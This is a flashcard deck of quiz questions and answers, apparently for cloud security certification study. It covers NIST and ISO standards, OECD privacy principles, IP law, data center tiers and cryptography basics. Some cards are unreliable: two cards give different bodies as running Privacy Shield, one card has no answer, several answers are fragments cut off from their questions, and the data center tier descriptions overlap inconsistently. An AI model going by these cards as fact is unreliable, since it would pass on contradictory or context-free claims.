National Institute of Standards and Technology (NIST) SP 800-37

A

National Institute of Standards and Technology (NIST) SP 800-37 is the Guide for Implementing the Risk Management Framework (RMF), a methodology for handling all organizational risk in a holistic, comprehensive, and continual manner.

268
Q

KPIs, KRIs

A

Key risk indicators (KRIs) try to predict future risk, while key performance indicators (KPIs) examine events that have already happened.

269
Q

Cloud Security Alliance Cloud Controls Matrix (CCM)

A

An inventory of cloud service security controls that are arranged into separate security domains.

270
Q

The acceptable use policy (AUP)

A

The acceptable use policy (AUP) is designed to make clear to employees what is acceptable as well as unacceptable use of company-owned computing equipment and data such as email.

271
Q

ISO 20000-1

A

ISO 20000-1 describes service management.

ISO 27001 describes an information security management system.

ITIL is not an ISO standard, nor is COBIT—in fact, they’re their own standards.

272
Q

ISO 27001

A

ISO 27001 describes an information security management system (ISMS) as a set of interrelated elements that organizations use to manage and control information security risks to protect and preserve the confidentiality, integrity, and availability of information.

273
Q

ISO/IEC 27037:2012

A

ISO/IEC 27037:2012 is the ISO standard for collecting, preserving, and identifying electronic evidence.

274
Q

The Cloud Security Alliance (CSA)

A

The Cloud Security Alliance (CSA) is the world’s leading organization dedicated to defining and raising awareness of best practices to help ensure a secure cloud computing environment.

275
Q

ISO - Common criteria

A

ISO publishes and maintains the Common Criteria program.

276
Q

The Diffie-Hellman

RADIUS

TACACS

A

The Diffie-Hellman key exchange process is designed to allow two parties to create a shared secret (symmetric key) over an untrusted medium.

RADIUS is an outmoded access control service for remote users. RSA is an encryption scheme.

TACACS is a network access protocol set used through a centralized server.

277
Q

The Organisation for Economic Cooperation and Development (OECD)

Characteristics of the OECD privacy principles:
The collection limitation principle
The data quality principle
Purpose specification principle
The use limitation principle
The security safeguards principle
The openness principle

A

The collection limitation principle requires any entity that gathers personally identifiable information (PII) about a person to restrict data collection to only information that is necessary for the transaction, and only with the knowledge and permission of the individual.

The data quality principle requires any entity that gathers personally identifiable information (PII) about a person to ensure that the data remains valid and accurate and allows for corrections by the data subject.

The purpose specification principle requires any entity that gathers personally identifiable information (PII) about a person to clearly state the explicit purpose for which the PII will be used.

The use limitation principle requires any entity that gathers personally identifiable information (PII) about a person to restrict the use of that PII to that which was permitted by the data subject and the reason given when it was collected.

The security safeguards principle requires any entity that gathers personally identifiable information (PII) about a person to protect that data against unauthorized access and modification.

The openness principle requires any entity that gathers personally identifiable information (PII) about a person to allow that person to access the information.

278
Q

The Privacy Shield program is

A

Voluntary for non–European Union (EU) entities

279
Q

Department of Commerce

A

The Department of Commerce manages the Privacy Shield program in the United States; the Departments of State and Interior do not. There is no Department of Trade.

280
Q

ISO 27001, ISO 27002
NIST SP 800-53, NIST SP 800-37

A

The 27002 standard contains sets of controls to be used in order to allow the organization to match the security program created for the organization with 27001.

NIST SP 800-53 allows the organization to craft a set of controls to meet the requirements created for and by the organization when using NIST SP 800-37.

281
Q

The EuroCloud Star Audit (ECSA) program

A
282
Q

The silver platter doctrine

A

The silver platter doctrine allows law enforcement entities to use material presented voluntarily by the owner as evidence in the prosecution of crimes, without a warrant or a court order.

283
Q

File hashes

A

File hashes can serve as integrity checks for both configuration management (to determine which systems are not configured to the baseline) and audit purposes (as artifacts/common builds of systems for audit review).

284
Q

The Reporting phase of forensic investigation: the court

A

The Reporting phase of forensic investigation usually involves presenting findings to the court.

285
Q

Federal Trade Commission (FTC)

A

The FTC is in charge of the Privacy Shield program.

286
Q

The Capability Maturity Model (CMM)

A

The CMM is a way of determining a target’s maturity in terms of process documentation and repeatability.

287
Q

How many controls are listed in the PCI DSS? Over 200

A

The PCI DSS is extremely thorough and wide-reaching.

Merchants at different tiers are required to have more or fewer audits in the same time frame than merchants in other tiers, depending on the tier.
All PCI DSS–compliant merchants must meet all the control and audit requirements of the standard.

288
Q

Patent, copyright,
trademark validity,
trade secret

A

Patent: 20 years

Copyright: life of the author + 70 years.
Copyrights expire after a certain duration and then fall into the public domain, where they can be used by anyone for any purpose. This material certainly exceeds the time of any copyright protection.

Trademark:
10 years from the date of registration, with a potentially unlimited number of 10-year renewal terms; it is renewed with the U.S. Patent and Trademark Office (USPTO).

Trade secrets:
Unlike patents, which typically have a shelf life of twenty years, trade secrets last indefinitely. Trade secrets last as long as the secret can be kept.

289
Q

ISO 31000, NIST 800-37 - RMF (Risk management frameworks)

A

Both ISO 31000 and National Institute of Standards and Technology (NIST) 800-37 are risk management frameworks.

290
Q

The Cloud Security Alliance - CSA

A

The Cloud Security Alliance is a volunteer organization that includes members from various industries and sectors and is focused on cloud computing. It relies largely on member participation for developing standards.

291
Q

Cloud Security Alliance Cloud Controls Matrix (CSA CCM) - TOOL

A

The Cloud Controls Matrix is an excellent tool for determining completeness and possible replication of security controls.

292
Q

Civil Suit

A

Intellectual property disputes are usually settled in civil court, as a conflict among private parties.

293
Q

Trademark protection

A

Trademark protection is provided to those who apply for it, to either a state or federal trademark registration body. In the case of conflicting usage (or infringement), courts will take many criteria into account, including which party has first claim on the trademark (that is, who used it the longest), the location(s) where the trademark is used, the possibility for confusion among customers, and so forth. But for a specific location and specific business purpose, the deciding element will probably be which party first registered the trademark in question.

294
Q

Which elements are appropriate to include in a service-level agreement (SLA)?

A

SLA elements should be objective, numeric values for repeated activity.

E.g., the specific amount of data that can be uploaded to the cloud environment in any given month.

295
Q

Criminal law

A

Criminal law is set out in rules and statutes created by a government, prohibiting certain activities as a means of protecting the safety and well-being of its citizens. Punishments for violations generally consist of monetary penalties and/or loss of liberty.

296
Q

Tort law

A

Tort law refers to the body of laws that provide remedies to individuals who have been caused harm by the unreasonable acts of others. Negligence is the most common type of tort lawsuit.

297
Q

Spoliation

A

Spoliation is the term used to describe the destruction of potential evidence (intentionally or otherwise); in various jurisdictions, it can be a crime, or the grounds for another lawsuit.

298
Q

The Digital Millennium Copyright Act (DMCA)

A

The DMCA criminalizes the production or dissemination of technology, devices, or services intended to circumvent copyright techniques used to protect digital media such as video and audio recordings; this includes some decryption tools.

299
Q

Discovery tool

A

Typically, a discovery tool is a primary component of a DLP solution. This might be employed for purposes of identifying and collecting pertinent data.

300
Q

Contracts

A

Contracts are agreements between parties to exchange goods and services.

301
Q

Extradition

A

Extradition is the legal practice of removing a suspect from one jurisdiction to another in order for the suspect to face prosecution for violating laws in the latter.

302
Q

International Organization for Standardization (ISO) 31000:2009

A

ISO 31000:2009 focuses on design, implementation, and management.

303
Q

The Privacy Shield program is

A

Voluntary for non–European Union (EU) entities

304
Q

The AICPA, the OECD, and the EU GDPR have all outlined certain basic expectations

A

The AICPA, the OECD, and the EU have all outlined certain basic expectations for entities that are privacy data controllers; these expectations are extremely similar in the documentation produced by all three.

305
Q

One of the characteristics the OECD suggests that privacy laws include is the

A

Purpose specification principle
Use limitation principle

306
Q

Cryptography for the two main types of APIs

A

Cryptography for the two main types of APIs is required: TLS for representational state transfer (REST) and message-level encryption for Simple Object Access Protocol (SOAP).

307
Q

SLA Elements

A

SLA elements should be objective, numeric values for repeated activity.

308
Q

Private cloud

A

Your company operates under a high degree of regulatory scrutiny.

309
Q

Acquiring and managing software licenses

SaaS, PaaS

A

The customer is still responsible for some software licensing and maintenance activities (and therefore costs) in infrastructure as a service (IaaS) and platform as a service (PaaS) models.

In a software as a service (SaaS) model, the cloud provider is tasked with acquiring and managing the software licenses; the scale of a cloud provider’s operations can allow them to reduce the per-seat cost of software considerably.

310
Q

DC Tier 1

A

For contingency backup and archiving purposes, a Tier 1 data center should suffice; it is the cheapest, and you need it only for occasional backup purposes (as opposed to constant access). The details of location and market are irrelevant.

Tier 1: to support an organization that wants to conduct IT operations.

Tier 1 data centers are expected to help protect against human error, not outages or disasters. They’re also expected to have redundancy for chillers, pumps, UPS devices, and generators but are likely to have to shut down for maintenance activities.

311
Q

DC Tier 2:

A

Tier 2 facilities provide more redundancy than Tier 1 facilities.

Tier 2 facilities are intended to ensure that critical operations are not interrupted due to planned maintenance.

312
Q

DC Tier 3:

A

The Tier 3 design is known as a “concurrently maintainable site infrastructure.” As the name indicates, the facility features both the redundant capacity components of a Tier 2 build and the added benefit of multiple distribution paths, where only a sole path is needed to serve critical operations at any given time.

313
Q

DC Tier 4:

A

Tier 4 data centers are the highest level described by the Uptime Institute.

They have independent and physically isolated systems providing redundancy and resiliency at both the component and distribution path levels, ensuring that events that compromised one system would not take out the redundant system.

314
Q

Data Center Tier

A

Uptime Percentage:

Tier 1: 99.671
Tier 2: 99.741
Tier 3: 99.982
Tier 4: 99.995

315
Q

Your company will not be allowed to use a cloud data center in which of the following countries? (if EU data is there)

A

South Korea
The United States

316
Q

Community cloud

A

company’s collaboration needs.

317
Q

Private cloud

A

highly sensitive industries, including aerospace and pharmaceuticals.

318
Q

TCI

A

The TCI does not specifically require cost-effectiveness of cloud services.

319
Q

Risk in managed cloud env

A

Management plane breach allows an attacker to gain full control of the environment and can affect all aspects of the CIA triad.

320
Q

Private cloud storage

A

One type of cloud storage wherein cloud and enterprise storage both reside inside the enterprise behind the firewall.

321
Q

Public cloud storage

A

This form of cloud storage involves the enterprise and storage service being separate, with data stored outside the confines of the enterprise environment.

322
Q

Mobile cloud storage

A

This form of cloud storage applies to storing mobile device data in the cloud while providing access to the stored data from anywhere.

323
Q

Enterprise risk management

A

A set of processes and structures used to effectively manage all risks to an enterprise.

324
Q

Which of the following circumstances would not commonly result from humidity issues

A

Situations where humidity is too high may result in the buildup of moisture and corrosion of equipment. If humidity falls too low, it may result in static electricity issues. Humidity issues generally do not contribute to fires or physical access control failures.

325
Q

Inert gas systems

A

Inert gas systems use no water and are unlikely to damage sensitive electronic equipment, even if discharged. Wet pipe, dry pipe, and preaction systems all use water and may damage or destroy electronic equipment if activated or damaged.

326
Q

Which one of the following hash algorithms would not trigger this vulnerability?

MD4
MD5
SHA-1
SHA-256

A

To be used in a secure manner, certificates must take advantage of a hash function that is not prone to collisions. The MD2, MD4, MD5, and SHA-1 algorithms all have demonstrated weaknesses and would trigger a vulnerability. The SHA-256 algorithm is still considered secure.

327
Q

Asymmetric encryption: public key, private key

The receiver uses his private key to decrypt.

A

The recipient of a message encrypted using an asymmetric encryption algorithm decrypts that message using their own private key. Therefore, Alice should use her own private key to decrypt the message that Bob encrypted using Alice’s public key.

328
Q

Minimum amount of time to expect a UPS
to provide power to the systems in the datacenter

10 minutes

A

The purpose of an uninterruptible power supply (UPS) is to provide power to systems for a short period of time. It provides immediate backup power from a battery that should be quickly replaced by long-term backup power from a generator or similar source. For this reason, you should only expect the UPS to last for about 10 minutes.

329
Q

For IRM:
Digital certificate revocation: 2 ways
Online Certificate Status Protocol (OCSP) – faster
Adding the certificate to a Certificate Revocation List (CRL)

A

There are two possible techniques for revoking a digital certificate: updating the certificate’s status using the Online Certificate Status Protocol (OCSP) and adding the certificate to a Certificate Revocation List (CRL). Of these, OCSP provides faster updates and is the preferred method. It is not possible to change the public or private keys associated with an existing digital certificate.

330
Q

Ephemeral storage:

Terminating a server completely deletes it and the ephemeral storage.

A

Ephemeral storage is temporary storage associated with a server instance. It will be deleted if the server is terminated, but it will not be deleted if the server is simply stopped or rebooted. Stopping a server allows it to be restarted at a later time, which requires access to the ephemeral storage. Terminating a server completely deletes it and the ephemeral storage.

331
Q

Tokenization

A

Tokenization is an approved alternative to encryption for complying with Payment Card Industry (PCI) requirements.

332
Q

RAID: Business Continuity Action

Disaster recovery actions:

restoring from backup tapes,
relocating to a cold site,
and restarting business operations

A

RAID technology provides fault tolerance for hard drive failures and is an example of a business continuity action.

Restoring from backup tapes, relocating to a cold site, and restarting business operations are all disaster recovery actions.

333
Q

SOAP - Interoperability

A

SOAP uses an XML-based approach to interoperability, allowing systems to interact more easily.

334
Q

VLAN Characteristics

A

Broadcast packets sent by a machine inside the VLAN will reach all other machines in that VLAN.

Broadcast packets sent from a machine outside the VLAN will not reach machines inside the VLAN.

Broadcast packets sent by a machine inside the VLAN will not reach machines outside the VLAN.

335
Q

Goal of a site survey

A

Threat definition

Target identification

Facility characteristics

336
Q

Access control to virtualization management tools should be

A

Role-based

337
Q

Synthetic performance monitoring may be preferable to real-user monitoring (RUM) because

A

Synthetic agents can simulate user activity in a much faster, broader manner and perform these actions 24/7 without rest.

338
Q

Inference

A

Inference is an attack strategy, not a reason for implementing tokenization. All the other answers are good reasons to implement tokenization, and they are therefore not correct.

339
Q

Negative aspects of bit-splitting

A

It may require trust in additional third parties beyond the primary cloud service provider.

Significantly greater processing overhead

Some risk to availability, depending on the implementation

340
Q

Agile analytics/business intelligence

A

A data discovery approach that offers insight into trends of trends, using both historical and predictive approaches.

341
Q

Real-time analytics

A

A data discovery approach used by e-commerce retailers to discern and predict shoppers’ needs.

342
Q

Tools that might be useful in data discovery efforts based on content analysis

A

Egress monitoring solutions

343
Q

Hashing

A

Hashing is a cryptographic one-way function applied to data in a database to allow it to be referenced without using the actual data.

344
Q

Service Provider Engineers

A

Management plane of a cloud datacenter.

345
Q

XML Firewall

A

SAML is an XML-based protocol, and Kristen knows that an XML firewall that is SAML-aware with appropriate rules for identity-based protection would be her best option. IDS systems cannot rate-limit even if they are SAML-aware. WAFs are designed for web applications rather than specifically for XML and SAML-based filtering, and a DAM is a database-specific tool.

346
Q

ASVS (Application Security Verification Standard)

A

ASVS uses a three-level code validation assurance level model, with level 3 requiring critical applications to meet in-depth validation and testing requirements.

347
Q

Virtual TPM

boot security

A

A virtual trusted platform module (vTPM) is the only solution that will meet Jack’s needs. HSMs (hardware security modules) are used to create, store, and manage secrets, including cryptographic keys and certificates, but aren’t used for boot security.

348
Q

ISO
ISAE
SSAE

A

ISO 20000-1: describes service management.
ISO 27001: information security management system (ISMS), the organisation’s entire security program, cyber security control objectives.
ISO 27002: covers cybersecurity control implementation.
ISO 27017: designed for cloud service providers.
ISO 27018: describes privacy requirements for cloud providers.
ISO 27034: mandates a framework for application security within an organization (ONF, ANF).
ISO 27037: collecting, preserving, and identifying electronic evidence.
ISO 27050: guidance for eDiscovery programs.
ISO 27701: industry standard guidance for information privacy programs.

ISO 28000: specifies security management systems.
ISO 31000: focuses on design, implementation, and management.

ISAE 3402: International Standard on Assurance Engagements.
ISAE 3410: Assurance Engagements on Greenhouse Gas Statements.
SSAE 16
SSAE 18: Statement on Standards for Attestation Engagements 18, a set of auditing standards that help businesses evaluate the controls of their service providers.